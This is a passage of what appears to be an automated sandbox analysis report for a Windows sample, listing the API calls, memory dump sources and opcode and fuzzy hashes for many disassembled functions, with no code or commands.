                        • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                        • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                        • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                        • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                        APIs
                        • _set_new_mode.LIBCMT ref: 0040D88C
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,02562EC8), ref: 0040D8B9
                        • FreeLibrary.KERNEL32(?), ref: 0040D8CE
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: FreeInfoLibraryParametersSystem_set_new_mode
                        • String ID:
                        • API String ID: 1188159508-0
                        • Opcode ID: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                        • Instruction ID: 2b4412acdce639bfbf0f9e0c9ecf3f694f94d165ded01d265c3c64edb54a61d9
                        • Opcode Fuzzy Hash: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                        • Instruction Fuzzy Hash: C2215EB19183009FC700EF56D88150ABBE4FB98354F44497EF849A72A2D735A945CB9A
                        APIs
                        • RegOpenKeyExW.KERNEL32 ref: 0040F132
                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,80000001,80000001), ref: 0040F14F
                        • RegCloseKey.ADVAPI32(00000000), ref: 0040F159
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID:
                        • API String ID: 3677997916-0
                        • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                        • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                        • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                        • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                        APIs
                        • _malloc.LIBCMT ref: 00435278
                          • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                          • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                          • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                        • _malloc.LIBCMT ref: 00435288
                        • _malloc.LIBCMT ref: 00435298
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _malloc$AllocateHeap
                        • String ID:
                        • API String ID: 680241177-0
                        • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                        • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                        • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                        • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                        APIs
                        • __lock.LIBCMT ref: 00411ACE
                          • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                          • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                          • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                        • __decode_pointer.LIBCMT ref: 00411AD9
                          • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
                          • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00000003,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
                          • Part of subcall function 004169E9: RtlDecodePointer.NTDLL(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A50
                        • __encode_pointer.LIBCMT ref: 00411AE3
                          • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                          • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                          • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
                          • Part of subcall function 0041832D: LeaveCriticalSection.KERNEL32(?,00413AE5,00000004,00413AD3,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004), ref: 0041833C
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Value$CriticalPointerSection$DecodeEncodeEnterLeave__amsg_exit__decode_pointer__encode_pointer__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 741361212-0
                        • Opcode ID: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                        • Instruction ID: 38d776d816f70f727deb20f5ce19c96205530670ca88b6e54865c94596e56b2a
                        • Opcode Fuzzy Hash: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                        • Instruction Fuzzy Hash: B9D05EB1A00318B7CA0037E69C07ADA3E45CB407A8F0604BFFB0857252ED3AC85082DD
                        APIs
                        • _wcslen.LIBCMT ref: 00401B71
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                        • String ID: @EXITCODE
                        • API String ID: 580348202-3436989551
                        • Opcode ID: 6cf3cde66a08f965a4344bc1fc3281b19b19243cf66827a1cf885af4ed451a9e
                        • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                        • Opcode Fuzzy Hash: 6cf3cde66a08f965a4344bc1fc3281b19b19243cf66827a1cf885af4ed451a9e
                        • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 51cfedfac6ba8ed27beb15463d9905f7e3b98aa276e896645a96f371ccd655a0
                        • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                        • Opcode Fuzzy Hash: 51cfedfac6ba8ed27beb15463d9905f7e3b98aa276e896645a96f371ccd655a0
                        • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040F00A
                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004299D9
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                        • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                        • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                        • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __lock_file_memset
                        • String ID:
                        • API String ID: 26237723-0
                        • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                        • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                        • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                        • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                        APIs
                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                        • __lock_file.LIBCMT ref: 00414EE4
                          • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                        • __fclose_nolock.LIBCMT ref: 00414EEE
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 717694121-0
                        • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                        • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                        • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                        • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                        APIs
                        • TranslateMessage.USER32(?), ref: 004098F6
                        • DispatchMessageW.USER32(?), ref: 00409901
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Message$DispatchTranslate
                        • String ID:
                        • API String ID: 1706434739-0
                        • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                        • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                        • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                        • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                        APIs
                        • TranslateMessage.USER32(?), ref: 004098F6
                        • DispatchMessageW.USER32(?), ref: 00409901
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Message$DispatchTranslate
                        • String ID:
                        • API String ID: 1706434739-0
                        • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                        • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                        • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                        • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(00002000,00000000,0040D89F,00000000,?,?,0040D89F,02562EC8), ref: 0040F386
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,0040D89F,02562EC8), ref: 0040F39E
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CallbackDispatcherInfoParametersSystemUser
                        • String ID:
                        • API String ID: 1232580896-0
                        • Opcode ID: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                        • Instruction ID: 65e1473dc04fc68897f4a965434dba24c69ef846d3a13abfb0e70c8142ecb83e
                        • Opcode Fuzzy Hash: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                        • Instruction Fuzzy Hash: F2E0EC727953107AF21486408C46F56A7989B44B11F10C51AB7059B1C1C6F0A840CB95
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                        • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                        • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                        • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ProcWindow
                        • String ID:
                        • API String ID: 181713994-0
                        • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                        • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                        • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                        • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                        APIs
                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                        • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                        • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                        • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                        APIs
                          • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001), ref: 004442F3
                        • WriteFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00444362
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: File$PointerWrite
                        • String ID:
                        • API String ID: 539440098-0
                        • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                        • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                        • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                        • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                        APIs
                          • Part of subcall function 0041181B: __lock.LIBCMT ref: 0041181D
                        • __onexit_nolock.LIBCMT ref: 004113FD
                          • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411309
                          • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411319
                          • Part of subcall function 004112FA: __msize.LIBCMT ref: 00411337
                          • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 0041135B
                          • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 00411371
                          • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411383
                          • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411391
                          • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 0041139C
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                        • String ID:
                        • API String ID: 1316407801-0
